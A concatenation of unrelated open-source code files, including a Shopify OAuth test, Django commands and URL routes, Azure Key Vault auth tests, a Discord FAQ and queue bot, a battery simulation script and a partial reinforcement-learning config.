TEST_DATA = Box(
dict(
app_scopes=['write_products', 'read_customers'],
user_scopes=['write_orders', 'read_products'],
public_domain='test.testing.com',
private_key='TESTPRIVATEKEY',
post_install=AsyncMock(return_value=JWTBaseModel()),
post_login=AsyncMock(return_value=None),
app_handle=HANDLE,
api_key=SHOPIFY_API_KEY,
api_secret_key=SHOPIFY_SECRET_KEY,
)
)
OFFLINETOKEN_DATA = dict(access_token='OFFLINETOKEN', scope=','.join(TEST_DATA.app_scopes))
ONLINETOKEN_DATA = dict(
access_token='ONLINETOKEN',
scope=','.join(TEST_DATA.app_scopes),
expires_in=86399,
associated_user_scope=','.join(TEST_DATA.user_scopes),
associated_user={
'id': 902541635,
'first_name': 'John',
'last_name': 'Smith',
'email': '[email protected]',
'email_verified': True,
'account_owner': True,
'locale': 'en',
'collaborator': False,
},
)
@dataclass
class MockHTTPResponse:
status_code: int
jsondata: dict
headers: dict = None # type: ignore
def json(self):
return self.jsondata
@pytest.mark.asyncio
async def test_oauth(mocker):
app = FastAPI()
oauth_router = init_oauth_router(**TEST_DATA)
app.include_router(oauth_router)
client = TestClient(app)
# --------- Test the initialization endpoint -----------
# Missing shop argument
response = client.get('/shopify/auth')
assert response.status_code == 422
assert response.json() == {
'detail': [
{'loc': ['query', 'shop'], 'msg': 'field required', 'type': 'value_error.missing'}
],
}
# Happy path
response = client.get('/shopify/auth', params=dict(shop=TEST_STORE), allow_redirects=False)
query = check_oauth_redirect_url(
response=response, client=client, path='/admin/oauth/authorize', scope=TEST_DATA.app_scopes
)
state = check_oauth_redirect_query(query=query, scope=TEST_DATA.app_scopes)
# Callback calls to get tokens
shopify_request_mock = mocker.patch('httpx.AsyncClient.request', new_callable=AsyncMock)
shopify_request_mock.side_effect = [
MockHTTPResponse(status_code=200, jsondata=OFFLINETOKEN_DATA),
MockHTTPResponse(status_code=200, jsondata=ONLINETOKEN_DATA),
]
# --------- Test the callback endpoint for installation -----------
query_str = urlencode(
dict(shop=TEST_STORE, state=state, timestamp=now_epoch(), code='INSTALLCODE')
)
hmac_arg = hmac.calculate_from_message(secret=SHOPIFY_SECRET_KEY, message=query_str)
query_str += '&hmac=' + hmac_arg
response = client.get('/callback', params=query_str, allow_redirects=False)
query = check_oauth_redirect_url(
response=response,
client=client,
path='/admin/oauth/authorize',
scope=TEST_DATA.user_scopes,
)
state = check_oauth_redirect_query(
query=query,
scope=TEST_DATA.user_scopes,
query_extra={'grant_options[]': ['per-user']},
)
assert await shopify_request_mock.called_with(
method='post',
url=f'https://{TEST_STORE}/admin/oauth/access_token',
json={
'client_id': SHOPIFY_API_KEY,
'client_secret': SHOPIFY_SECRET_KEY,
'code': 'INSTALLCODE',
},
)
TEST_DATA.post_install.assert_called_once()
TEST_DATA.post_install.assert_called_with('test', OfflineToken(**OFFLINETOKEN_DATA))
# --------- Test the callback endpoint for login -----------
query_str = urlencode(
dict(shop=TEST_STORE, state=state, timestamp=now_epoch(), code='LOGINCODE'), safe='=,&/[]:'
)
hmac_arg = hmac.calculate_from_message(secret=SHOPIFY_SECRET_KEY, message=query_str)
query_str += '&hmac=' + hmac_arg
response = client.get('/callback', params=query_str, allow_redirects=False)
state = check_oauth_redirect_url(
response=response,
client=client,
path=f'/admin/apps/{HANDLE}',
scope=TEST_DATA.user_scopes,
)
assert await shopify_request_mock.called_with(
method='post',
url=f'https://{TEST_STORE}/admin/oauth/access_token',
json={
'client_id': SHOPIFY_API_KEY,
'client_secret': SHOPIFY_SECRET_KEY,
'code': 'LOGINCODE',
},
)
TEST_DATA.post_login.assert_called_once()
TEST_DATA.post_login.assert_called_with('test', OnlineToken(**ONLINETOKEN_DATA))
def check_oauth_redirect_url(response: Response, client, path: str, scope: List[str]) -> str:
print(response.text)
assert response.status_code == 307
parsed_url = urlparse(client.get_redirect_target(response))
expected_parsed_url = ParseResult(
scheme='https',
netloc=TEST_STORE,
path=path,
query=parsed_url.query, # We check that separately
params='',
fragment='',
)
assert parsed_url == expected_parsed_url
return parsed_url.query
def check_oauth_redirect_query(query: str, scope: List[str], query_extra: dict = {}) -> str:
parsed_query = parse_qs(query)
state = parsed_query.pop('state', [''])[0]
expected_query = dict(
client_id=[SHOPIFY_API_KEY],
redirect_uri=[f'https://{TEST_DATA.public_domain}/callback'],
scope=[','.join(scope)],
)
expected_query.update(query_extra)
assert parsed_query == expected_query
return state
|
the-stack_106_30685 | """
This command is used to add an Institution to the database.
Execution: python manage.py add_institution <name> <cas_server_url>
"""
from django.core.exceptions import ValidationError
from django.core.management.base import BaseCommand, CommandError
from django.core.validators import URLValidator
from django.utils.text import slugify
from uniauth.models import Institution
class Command(BaseCommand):
help = "Adds an institution to the database."
def add_arguments(self, parser):
parser.add_argument('name')
parser.add_argument('cas_server_url')
parser.add_argument(
'--update-existing',
action='store_true',
default=False,
help='Update the institution, if it already exists.')
def handle(self, *args, **options):
slug = slugify(options['name'])
cas_server_url = options['cas_server_url']
if (not options['update_existing']
and Institution.objects.filter(slug=slug).exists()):
raise CommandError("An institution with slug '" +
slug + "' already exists.")
try:
validator = URLValidator()
validator(options['cas_server_url'])
except ValidationError:
raise CommandError("Provided CAS server URL '" +
cas_server_url + "' is malformed.")
institution, created = Institution.objects.get_or_create(
name=options['name'],
slug=slug,
defaults={'cas_server_url': cas_server_url}
)
if created:
self.stdout.write("Created institution '%s'.\n" % str(institution))
elif institution.cas_server_url != cas_server_url:
# If institution already exists but with a different URL,
# update it.
institution.cas_server_url = cas_server_url
institution.save()
self.stdout.write("Updated institution '%s'.\n" % str(institution))
|
the-stack_106_30686 | from setuptools import setup, find_packages
install_requires = [line.rstrip() for line in open("requirements/requirements.txt", "r")]
setup(
name="inhandpy",
version="0.0.1",
description="PatchGraph: In-hand tactile tracking with learned surface normals",
url="",
author="Paloma Sodhi",
author_email="[email protected]",
license="LICENSE",
packages=find_packages("src"),
package_dir={"": "src"},
install_requires=install_requires,
python_requires=">=3.6",
) |
the-stack_106_30687 | # ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
"""
Tests for the HTTP challenge authentication implementation. These tests aren't parallelizable, because
the challenge cache is global to the process.
"""
try:
from unittest.mock import Mock
except ImportError: # python < 3.3
from mock import Mock
from azure.core.credentials import AccessToken
from azure.core.pipeline import Pipeline
from azure.core.pipeline.transport import HttpRequest
from azure.keyvault.keys._shared import ChallengeAuthPolicy, HttpChallenge, HttpChallengeCache
import pytest
from helpers import mock_response, Request, validating_transport
def test_challenge_cache():
# ensure the test starts with an empty cache
HttpChallengeCache.clear()
url_a = "https://azure.service.a"
challenge_a = HttpChallenge(url_a, "Bearer authorization=authority A, resource=resource A")
url_b = "https://azure.service.b"
challenge_b = HttpChallenge(url_b, "Bearer authorization=authority B, resource=resource B")
for url, challenge in zip((url_a, url_b), (challenge_a, challenge_b)):
HttpChallengeCache.set_challenge_for_url(url, challenge)
assert HttpChallengeCache.get_challenge_for_url(url) == challenge
assert HttpChallengeCache.get_challenge_for_url(url + "/some/path") == challenge
assert HttpChallengeCache.get_challenge_for_url(url + "/some/path?with-query=string") == challenge
assert HttpChallengeCache.get_challenge_for_url(url + ":443") == challenge
HttpChallengeCache.remove_challenge_for_url(url)
assert not HttpChallengeCache.get_challenge_for_url(url)
def test_challenge_parsing():
authority = "https://login.authority.net/tenant"
resource = "https://challenge.resource"
challenge = HttpChallenge(
"https://request.uri", challenge="Bearer authorization={}, resource={}".format(authority, resource)
)
assert challenge.get_authorization_server() == authority
assert challenge.get_resource() == resource
def test_policy():
# ensure the test starts with an empty cache
HttpChallengeCache.clear()
expected_scope = "https://challenge.resource/.default"
expected_token = "expected_token"
challenge = Mock(
status_code=401,
headers={
"WWW-Authenticate": 'Bearer authorization="https://login.authority.net/tenant", resource={}'.format(
expected_scope
)
},
)
success = Mock(status_code=200)
data = {"spam": "eggs"}
responses = (r for r in (challenge, success))
def send(request):
response = next(responses)
if response is challenge:
# this is the first request
assert not request.body
assert request.headers["Content-Length"] == "0"
elif response is success:
# this is the second request
assert request.body == data
assert expected_token in request.headers["Authorization"]
return response
def get_token(*scopes):
        assert len(scopes) == 1
assert scopes[0] == expected_scope
return AccessToken(expected_token, 0)
credential = Mock(get_token=Mock(wraps=get_token))
pipeline = Pipeline(policies=[ChallengeAuthPolicy(credential=credential)], transport=Mock(send=send))
pipeline.run(HttpRequest("POST", "https://azure.service", data=data))
assert credential.get_token.call_count == 1
def test_policy_updates_cache():
"""
It's possible for the challenge returned for a request to change, e.g. when a vault is moved to a new tenant.
When the policy receives a 401, it should update the cached challenge for the requested URL, if one exists.
"""
# ensure the test starts with an empty cache
HttpChallengeCache.clear()
url = "https://azure.service/path"
first_scope = "https://first-scope"
first_token = "first-scope-token"
second_scope = "https://second-scope"
second_token = "second-scope-token"
challenge_fmt = 'Bearer authorization="https://login.authority.net/tenant", resource={}'
# mocking a tenant change:
# 1. first request -> respond with challenge
# 2. second request should be authorized according to the challenge -> respond with success
# 3. third request should match the second -> respond with a new challenge
# 4. fourth request should be authorized according to the new challenge -> respond with success
# 5. fifth request should match the fourth -> respond with success
transport = validating_transport(
requests=(
Request(url),
Request(url, required_headers={"Authorization": "Bearer {}".format(first_token)}),
Request(url, required_headers={"Authorization": "Bearer {}".format(first_token)}),
Request(url, required_headers={"Authorization": "Bearer {}".format(second_token)}),
Request(url, required_headers={"Authorization": "Bearer {}".format(second_token)}),
),
responses=(
mock_response(status_code=401, headers={"WWW-Authenticate": challenge_fmt.format(first_scope)}),
mock_response(status_code=200),
mock_response(status_code=401, headers={"WWW-Authenticate": challenge_fmt.format(second_scope)}),
mock_response(status_code=200),
mock_response(status_code=200),
),
)
tokens = (t for t in [first_token] * 2 + [second_token] * 2)
credential = Mock(get_token=lambda _: AccessToken(next(tokens), 0))
pipeline = Pipeline(policies=[ChallengeAuthPolicy(credential=credential)], transport=transport)
# policy should complete and cache the first challenge
pipeline.run(HttpRequest("GET", url))
# The next request will receive a challenge. The policy should handle it and update the cache entry.
pipeline.run(HttpRequest("GET", url))
|
the-stack_106_30689 | class Node:
def __init__(self, data):
self.data = data
self.next = None
class LinkedList:
def __init__(self):
self.head = None
def push(self, new_data):
new_node = Node(new_data)
new_node.next = self.head
self.head = new_node
    def deleteNode(self, key):
        temp = self.head
        # Case 1: the key is in the head node, so just advance the head pointer
        if(temp != None):
            if(temp.data == key):
                self.head = temp.next
                temp = None
                return
        # Case 2: walk the list, remembering the node before the match
        while(temp != None):
            if temp.data == key:
                break
            prev = temp
            temp = temp.next
        # Key not found in the list
        if(temp == None):
            return
        # Unlink the matched node
        prev.next = temp.next
        temp = None
def printList(self):
temp = self.head
while(temp):
print(" %d" %(temp.data))
temp = temp.next
llist = LinkedList()
llist.push(7)
llist.push(1)
llist.push(3)
llist.push(2)
print("Creating your Linked List...")
llist.printList()
llist.deleteNode(1)
print("\nLinked List After Deletion of 1: ")
llist.printList()
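# Extra demonstration (added for illustration): deleting the current head node
# exercises the head-update branch of deleteNode above.
llist.deleteNode(2)
print("\nLinked List After Deletion of 2 (the head): ")
llist.printList()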
|
the-stack_106_30692 | """Webbot URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contrib import admin
from django.conf import settings
from WB_app.views import *
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
url(r'^get/id=(?P<id_solicitud>\w{0,90})/$', get_id, name='GET_byID'),
url(r'^get/list/', get_list, name='GET_all'),
url(r'^get/autor=(?P<nombre>.+?)/$', get_autor, name='GET_byautor'),
url(r'^get/titulo=(?P<titulo>.+?)/$',get_titulo,name='GET_bytitulo'),
url(r'^get/url=(?P<uu>.+?)/$',get_url,name='GET_byurl'),
url(r'^get/isbn=(?P<isbn>.+?)/$',get_isbn,name='GET_byisbn'),
url(r'^get/anio=(?P<anio>.+?)/$',get_anio,name='GET_byanio')
]
|
the-stack_106_30693 | import discord
from discord.ext import commands
from discord.ext.commands import Bot
import random
import asyncio
import aiohttp
print("Online")
bot = commands.Bot(command_prefix="~")
listDebugState = False
dataFiles = {"help":"C:\\Users\\Reese\\Desktop\\nohelp.txt",
"faq":"C:\\Users\\Reese\\Desktop\\faq.txt",
"list":"C:\\Users\\Reese\\Desktop\\list.txt",
"go":"C:\\Users\\Reese\\Desktop\\go.txt",
"token":"C:\\Users\\Reese\\Desktop\\token.txt"
}
messages = {"nohelp":" You have opted out of FAQ help. Opt back in with ~yeshelp",
"yeshelp":" You have opted back into FAQ help."
}
faqMessages = {
"HowToAscend":" You have to click the candle when it is off and hope no one turns it back off for 777 seconds. We have an organized list of who will ascend in which order, please ask to be added by a List Keeper in <#450922435915677697>",
"WhatIsAscension":" Ascension allows you to get out of the hole early. You also receive 51 dedication points and the ability to create a VIP room later.",
"HowToJoinChurch":" To join the church, keep refreshing the main page until you see a hand in the bottom left corner. It appears every 336 seconds. You can use https://poppy-church.glitch.me/hand to help.",
"HowToEnterHole":" To enter the hole, click the self destruct button on your personal report page.",
"HowToGetOut":" You automatically leave the hole after 24 hours, or you can ascend.",
"WhatIsGuardian":" Guardians are picked by Poppy, herself. They are usually highly active members of the community.",
"WhatIsSupportEmail":" The email is [email protected]",
"HowToChangeAvatar":" You can change your your avatar at https://poppy.church/settings",
"ShouldIClickCandle":" Only click the candle if it is your turn to ascend! To ascend with it, you must be the last person to turn it on before it reaches 0!",
"WhatIsCandle":" The candle is used to ascend.",
"WhatIsHole":" The hole is the only real game part of the website right now. Once in the hole, you can try to ascend.",
"HowToEarnPoint":" They seem to increase over time, multiple people have reported getting points if they have their personal report page open at 3:36 PST. You also get 51 dedication by ascending.",
"IsThereAChat":" It is coming, as confirmed by poppy.church support email" ,
"HowToChangeSignature":" You can change your signature by contacting the support email at [email protected]",
"WhatHappensToCandle":" The candle will toggle between on and off. Only click it if it is your turn to ascend!",
"WhatAreWhispers":" Check out the pins in <#450469478342328327>.",
"WhatIsPopcoin":" https://poppy.church/popcoin was found. We are unsure of what it does. Popcoin was the name given by us to the last section on the personal report.",
"WhatArePoints":" We aren't yet sure what the points on the reports are for.",
"WhatIsLove":" Baby don't hurt me, don't hurt me, no more",
"WhenWillIBeAccepted":" We aren't sure when, hopefully soon!",
"WhatIsVip":" You get the ability to create a VIP room by ascending. Nothing else is known about it.",
"WhoClicked":" We used to be able to, but it led to harassment and the ability was removed.",
"WhatIsSelfDestruct":" Self-destructing takes you to the hole.",
"WhatIsHand":" The hand allows you to join the church without a blessing.",
"WhatIsResultOfLeaving":" If you ascend, you gain 51 dedication and the ability to make a VIP room later. If you leave after 24 hours, nothing but freedom.",
"WhatIsCountDown":" The countdown is long as long as the candle is on. Once it reaches 0, someone ascends.",
"WhatIsPhoneNumber":" 831-777-6779",
"Loveyou":" I love you, too.",
"WhereIsTheCandle":" The candle is in the hole",
"WhoIsPoppy":" Poppy is our savior.",
"WhatIsPoppyChurch":" Poppy.Church is the house of our savior (also it's an ARG)."
}
async def send(message, user, response):
print("Message: " + message.content)
print("Response: " + response)
file = open(dataFiles["faq"], "a")
file.write("Message: " + message.content + "\n")
file.write("Response: " + response+"\n\n")
file.close()
await bot.send_message(message.channel,user.mention + response)
def getLines(file):
file = open(file, "r")
lines = file.readlines()
file.close()
return lines
def addDataToFile(key, data):
file = open(dataFiles[key],"a")
file.write(data + "\n")
file.close()
def inDataFile(key, element):
return element in open(dataFiles[key],"r").read()
def inhelp(id):
return id == "339567608338710530" or inDataFile("help", id)
def removeFromSupport(user: discord.Member):
addDataToFile("help", user.id)
def addToSupport(user: discord.Member):
lines = getLines(dataFiles["help"])
"""AddList = lambda list, user : [item for item in list if user.id not in item and not item.isspace()]"""
file = open(dataFiles["help"], "w")
file.writelines([item for item in lines if user.id not in item and not item.isspace()])
file.close()
def inlist(id):
return inDataFile("list", (id))
@bot.command(pass_context=True)
async def nohelp(ctx):
if not inhelp(ctx.message.author.id):
print("No help: " + ctx.message.author.display_name)
addToSupport(ctx.message.author)
await bot.say(ctx.message.author.mention + messages["nohelp"])
@bot.command(pass_context=True)
async def yeshelp(ctx):
if inhelp(ctx.message.author.id):
print("Yes help: "+ctx.message.author.display_name)
removeFromSupport(ctx.message.author)
await bot.say(ctx.message.author.mention + messages["yeshelp"])
@bot.command(pass_context=True)
async def clear(ctx):
if "450680633560399872" in [role.id for role in ctx.message.author.roles] or "449385190926712863" in [role.id for role in ctx.message.author.roles] or "339613815849353219" in [role.id for role in ctx.message.author.roles]:
server = ctx.message.author.server
        # Use the discord.py async-branch API (bot.logs_from / bot.delete_message),
        # consistent with the rest of this file
        async for message in bot.logs_from(ctx.message.channel):
            if message.author == bot.user:
                await bot.delete_message(message)
@bot.command(pass_context=True)
async def sayin(ctx, *args):
if "450680633560399872" in [role.id for role in ctx.message.author.roles] or "449385190926712863" in [role.id for role in ctx.message.author.roles] or "339613815849353219" in [role.id for role in ctx.message.author.roles]:
message = ""
for word in args[1:]:
message += word + " "
await bot.send_message(ctx.message.channel_mentions[0], message)
print(message)
def canEditList(user):
return "451240245468332033" in [role.id for role in user.roles] or "339613815849353219" in [role.id for role in user.roles] or "450680633560399872" in [role.id for role in user.roles] or "449385190926712863" in [role.id for role in user.roles]
@bot.command(pass_context=True)
async def listadd(ctx, user: discord.Member):
if canEditList(ctx.message.author):
message = ""
if not inlist(user.id):
if "\\" in str(user.display_name.encode('unicode_escape')):
index = str(user.display_name.encode('unicode_escape')).find("\\")
name = str(user.display_name.encode('unicode_escape'))[2:index]
else:
name = user.display_name
f = open(dataFiles["list"], "a")
f.write(user.id+"|"+name+"\n")
f.close()
lines = getLines(dataFiles["list"])
message = " has been added to the list."
else:
message = " is already on the list."
await bot.say(user.display_name + message)
@bot.command(pass_context=True)
async def listremove(ctx, user: discord.Member):
if canEditList(ctx.message.author):
if inlist(user.id):
lines = getLines(dataFiles["list"])
file = open(dataFiles["list"], "w")
file.writelines([item for item in lines if user.id not in item and not item.isspace()])
file.close()
await bot.say(user.display_name+" has been removed from the list.")
else:
await bot.say(user.display_name+" is not on the list.")
@bot.command(pass_context=True)
async def list(ctx):
guild = ctx.message.channel.server
lines = getLines(dataFiles["list"])
index=0
n=0
output = ""
embedSent = False
toDelete=[]
async for x in bot.logs_from(guild.get_channel("452213143926734859")):
toDelete.append(x)
if len(toDelete) > 1:
await bot.delete_messages(toDelete)
elif len(toDelete) == 1:
await bot.delete_message(toDelete[0])
for line in lines:
if len(line) > 1:
index = line.find("|")
nums = line[:index]
n += 1
if listDebugState:
print(nums)
output += str(n)+". "+guild.get_member(str(nums)).display_name+"\n"
if len(output) > 1930:
if not embedSent:
embed = discord.Embed(title="List:",description=output)
else:
embed = discord.Embed(description=output)
await bot.send_message(guild.get_channel("452213143926734859"),embed=embed)
output = ""
embedSent = True
goingList = getLines(dataFiles["go"])
goingString = goingList[0]
going = guild.get_member(str(goingString))
output += going.display_name+" is going."
if not embedSent:
embed = discord.Embed(title="List:",description=output)
else:
embed = discord.Embed(description=output)
await bot.send_message(guild.get_channel("452213143926734859"),embed=embed)
@bot.command(pass_context=True)
async def next(ctx, num: int = 0):
if num >= 0:
guild = ctx.message.channel.server
lines = getLines(dataFiles["list"])
count = 0
for line in lines:
index = line.find("|")
id = line[:index]
member = guild.get_member(str(id))
if member.status == guild.get_member(bot.user.id).status:
if count == num:
break
else:
count += 1
if (count+1)%10 == 1:
await bot.say(member.display_name+" is the "+str(count+1)+"st next online person on the list.")
elif (count+1)%10 == 2:
await bot.say(member.display_name+" is the "+str(count+1)+"nd next online person on the list.")
elif (count+1)%10 == 3:
await bot.say(member.display_name+" is the "+str(count+1)+"rd next online person on the list.")
else:
await bot.say(member.display_name+" is the "+str(count+1)+"th next online person on the list.")
@bot.command(pass_context=True)
async def listinsert(ctx, pos: int, user: discord.Member):
if canEditList(ctx.message.author):
if not inlist(user.id):
lines = getLines(dataFiles["list"])
if "\\" in str(user.display_name.encode('unicode_escape')):
index = str(user.display_name.encode('unicode_escape')).find("\\")
name = str(user.display_name.encode('unicode_escape'))[2:index]
else:
name = user.display_name
lines.insert(pos-1,user.id+"|"+name+"\n")
f = open(dataFiles["list"], "w")
f.writelines([item for item in lines if not item.isspace()])
f.close()
await bot.say(user.display_name+" has been inserted into the list at position "+str(pos)+".")
else:
await bot.say(user.display_name+" is already on the list. Please remove them first.")
@bot.command(pass_context=True)
async def listlocate(ctx, user: discord.Member = None):
if user == None:
user=ctx.message.author
lines = getLines(dataFiles["list"])
temp = 0
pos = 0
for line in lines:
temp += 1
if user.id in line:
pos = temp
break
message = ""
if pos > 0:
message = " is in position " + str(pos) + " on the list."
else:
message = " is not on the list."
await bot.say(user.display_name + message)
@bot.command(pass_context=True)
async def setgo(ctx, user: discord.Member):
if canEditList(ctx.message.author):
file = open(dataFiles["go"], "w")
file.write(user.id)
file.close()
await bot.say(user.display_name + " has been set as going.")
@bot.command(pass_context=True)
async def whogo(ctx):
guild = ctx.message.channel.server
lines = getLines(dataFiles["go"])
await bot.say(guild.get_member(lines[0]).display_name + " is going.")
@bot.command(pass_context=True)
async def listpos(ctx, pos: int):
guild = ctx.message.channel.server
lines = getLines(dataFiles["list"])
index = lines[pos-1].find("|")
nums = lines[pos-1][:index]
name = guild.get_member(str(nums)).display_name
await bot.say(name+" is in position "+str(pos)+" on the list.")
@bot.command(pass_context=True)
async def onlinelocate(ctx, user: discord.Member = None):
guild = ctx.message.channel.server
if user == None:
user = ctx.message.author
lines = getLines(dataFiles["list"])
count = 1
for line in lines:
index = line.find("|")
id = line[:index]
member = guild.get_member(str(id))
if member.status == guild.get_member(bot.user.id).status:
if user.id in line:
break
else:
count += 1
if member.display_name != user.display_name:
await bot.say(user.display_name+" is not on the list.")
elif count%10 == 1:
await bot.say(user.display_name+" is the "+str(count)+"st next online person on the list.")
elif count%10 == 2:
await bot.say(user.display_name+" is the "+str(count)+"nd next online person on the list.")
elif count%10 == 3:
await bot.say(user.display_name+" is the "+str(count)+"rd next online person on the list.")
else:
await bot.say(user.display_name+" is the "+str(count)+"th next online person on the list.")
@bot.command(pass_context=True)
async def listdebug(ctx, state: bool):
if "219260963268984832" in ctx.message.author.id:
global listDebugState
listDebugState = state
@bot.event
async def on_message(message):
user = message.author
m = message.content.lower()
lines = getLines(dataFiles["help"])
if not inhelp(user.id) and len(m) <= 50:
responses = []
if "how" in m and "ascend" in m and ("do" in m or "can" in m):
responses.append(faqMessages["HowToAscend"])
if "what" in m and ("ascension" in m or "ascending" in m) and ("is" in m or "does" in m):
responses.append(faqMessages["WhatIsAscension"])
if "how" in m and ("join" in m or "hand" in m or "get in" in m or "enter" in m or ("create" in m and "account" in m)) and "joined" not in m and "joining" not in m and ("can" in m or "do" in m) and "hole" not in m:
responses.append(faqMessages["HowToJoinChurch"])
if "how" in m and "hole" in m and ("get in" in m or "enter" in m or "work" in m) and ("do" in m or "can" in m):
responses.append(faqMessages["HowToEnterHole"])
if "how" in m and "hole" in m and ("get out" in m or "leave" in m or "long" in m) and ("do" in m or "can" in m):
responses.append(faqMessages["HowToGetOut"])
if ("how" in m or "what" in m) and "guardian" in m and ("do" in m or "is" in m or "are" in m):
responses.append(faqMessages["WhatIsGuardian"])
if "help " in m and "email" in m and "is" in m:
responses.append(faqMessages["WhatIsSupportEmail"])
if "change" in m and "avatar" in m and ("do" in m or "can" in m):
responses.append(faqMessages["HowToChangeAvatar"])
if ("should" in m or "do " in m or "can " in m) and ("click" in m or "touch" in m) and "candle" in m and "not" not in m:
responses.append(faqMessages["ShouldIClickCandle"])
if "what" in m and "candle" in m and "happens" not in m:
responses.append(faqMessages["WhatIsCandle"])
if "what" in m and "hole" in m and ("is" in m or "does" in m):
responses.append(faqMessages["WhatIsHole"])
if "how" in m and ("get" in m or "earn" in m or "gain " in m or "receive" in m) and ("points" in m or "dedication" in m or "loyalty" in m or "faith" in m) and ("do" in m or "does" in m or "can" in m):
responses.append(faqMessages["HowToEarnPoint"])
if ("will" in m or "is" in m) and ("be" in m or "potential" in m) and "chat" in m and "there" in m:
responses.append(faqMessages["IsThereAChat"])
if "change" in m and "signature" in m and ("do" in m or "can" in m):
responses.append(faqMessages["HowToChangeSignature"])
if "what" in m and "candle" in m and "happens" in m:
responses.append(faqMessages["WhatHappensToCandle"])
if "what" in m and "are" in m and "whispers" in m:
responses.append(faqMessages["WhatAreWhispers"])
if "what" in m and ("is" in m or "are" in m) and "popcoin" in m:
responses.append(faqMessages["WhatIsPopcoin"])
if "what" in m and ("is" in m or "are" in m) and ("points" in m or "dedication" in m or "loyalty" in m or "faith" in m):
responses.append(faqMessages["WhatArePoints"])
if "what is love" in m:
responses.append(faqMessages["WhatIsLove"])
if "when" in m and ("floor" in m or "accepted" in m):
responses.append(faqMessages["WhenWillIBeAccepted"])
if "what" in m and ("get" in m or "receive" in m or "earn" in m) and "ascend" in m:
responses.append(faqMessages["WhatIsAscension"])
if "what" in m and "vip" in m:
responses.append(faqMessages["WhatIsVip"])
if "can" in m and "see" in m and ("click" in m or "touch" in m) and "candle" in m:
responses.append(faqMessages["WhoClicked"])
if "what" in m and "self" in m and "destruct" in m:
responses.append(faqMessages["WhatIsSelfDestruct"])
if "what" in m and "hand" in m and ("is" in m or "do" in m):
responses.append(faqMessages["WhatIsHand"])
if "what" in m and ("happens" in m or ("do" in m and ("get" in m or "receive" in m or "earn" in m))) and ("leave" in m or "leaving " in m) and "hole" in m:
responses.append(faqMessages["WhatIsResultOfLeaving"])
if "what" in m and "countdown" in m and ("do" in m or "for" in m):
responses.append(faqMessages["WhatIsCountDown"])
if "what" in m and "phone number" in m:
responses.append(faqMessages["WhatIsPhoneNumber"])
if "339567608338710530" in m and "love" in m and "you" in m:
responses.append(faqMessages["Loveyou"])
if "where" in m and "is" in m and "candle" in m:
responses.append(faqMessages["WhereIsTheCandle"])
if "who" in m and "is" in m and "poppy" in m:
responses.append(faqMessages["WhoIsPoppy"])
if "what" in m and "is" in m and "poppy.church" in m:
responses.append(faqMessages["WhatIsPoppyChurch"])
"""Special FAQ"""
if ("we" in m or "i" in m) and " not in a cult" in m:
await bot.send_message(message.channel,message.content)
if "would you wear it" in m:
await bot.send_message(message.channel,"Wear a carrot?")
for answer in responses:
await send(message, user, answer)
await bot.process_commands(message)
@bot.event
async def on_member_remove(member):
if inlist(member.id):
lines = getLines(dataFiles["list"])
file = open(dataFiles["list"], "w")
file.writelines([item for item in lines if member.id not in item and not item.isspace()])
file.close()
print(member.display_name+" removal processed.")
bot.run(getLines(dataFiles["token"])[0]) |
the-stack_106_30694 | import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="sfquery",
version="1.0.0",
author="Antonio Menarde, Shalabh Mohan Shrivastava",
author_email="[email protected]",
description="A package to query reliable collections using python or jupyter notebook interfaces",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/amenarde/reliable-collections-cli",
license='MIT',
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
'Environment :: Console',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6'
],
packages=setuptools.find_packages(),
install_requires=['xmljson', 'sfctl', 'ipywidgets'],
) |
the-stack_106_30697 | #
# Compare lithium-ion battery models with and without particle size distribution
#
import numpy as np
import pybamm
pybamm.set_logging_level("INFO")
# load models
models = [
pybamm.lithium_ion.DFN(name="standard DFN"),
pybamm.lithium_ion.DFN(name="particle DFN"),
]
# load parameter values
params = [models[0].default_parameter_values, models[1].default_parameter_values]
def negative_distribution(x):
return 1 + 2 * x / models[1].param.l_n
def positive_distribution(x):
return 1 + 2 * (1 - x) / models[1].param.l_p
params[1]["Negative particle distribution in x"] = negative_distribution
params[1]["Positive particle distribution in x"] = positive_distribution
# set up and solve simulations
t_eval = np.linspace(0, 3600, 100)
sols = []
for model, param in zip(models, params):
sim = pybamm.Simulation(model, parameter_values=param)
sol = sim.solve(t_eval)
sols.append(sol)
output_variables = [
"Negative particle surface concentration",
"Electrolyte concentration",
"Positive particle surface concentration",
"Current [A]",
"Negative electrode potential [V]",
"Electrolyte potential [V]",
"Positive electrode potential [V]",
"Terminal voltage [V]",
"Negative particle distribution in x",
"Positive particle distribution in x",
]
# plot
plot = pybamm.QuickPlot(sols, output_variables=output_variables)
plot.dynamic_plot()
|
the-stack_106_30700 | import itertools
from ray import tune
from collections import OrderedDict
num_seeds = 5
var_env_configs = OrderedDict(
{
"delay": [0] + [2 ** i for i in range(4)],
"dummy_seed": [i for i in range(num_seeds)],
}
)
var_configs = OrderedDict({"env": var_env_configs})
env_config = {
"env": "GymEnvWrapper-Atari",
"env_config": {
"AtariEnv": {
"game": "space_invaders",
"obs_type": "image",
"frameskip": 1,
},
# "GymEnvWrapper": {
"atari_preprocessing": True,
"frame_skip": 4,
"grayscale_obs": False,
"state_space_type": "discrete",
"action_space_type": "discrete",
"seed": 0,
# },
# 'seed': 0, #seed
},
}
algorithm = "DQN"
agent_config = { # Taken from Ray tuned_examples
"adam_epsilon": 0.00015,
"buffer_size": 1000000,
"double_q": False,
"dueling": False,
"exploration_config": {"epsilon_timesteps": 200000, "final_epsilon": 0.01},
"final_prioritized_replay_beta": 1.0,
"hiddens": [512],
"learning_starts": 20000,
"lr": 6.25e-05,
"n_step": 1,
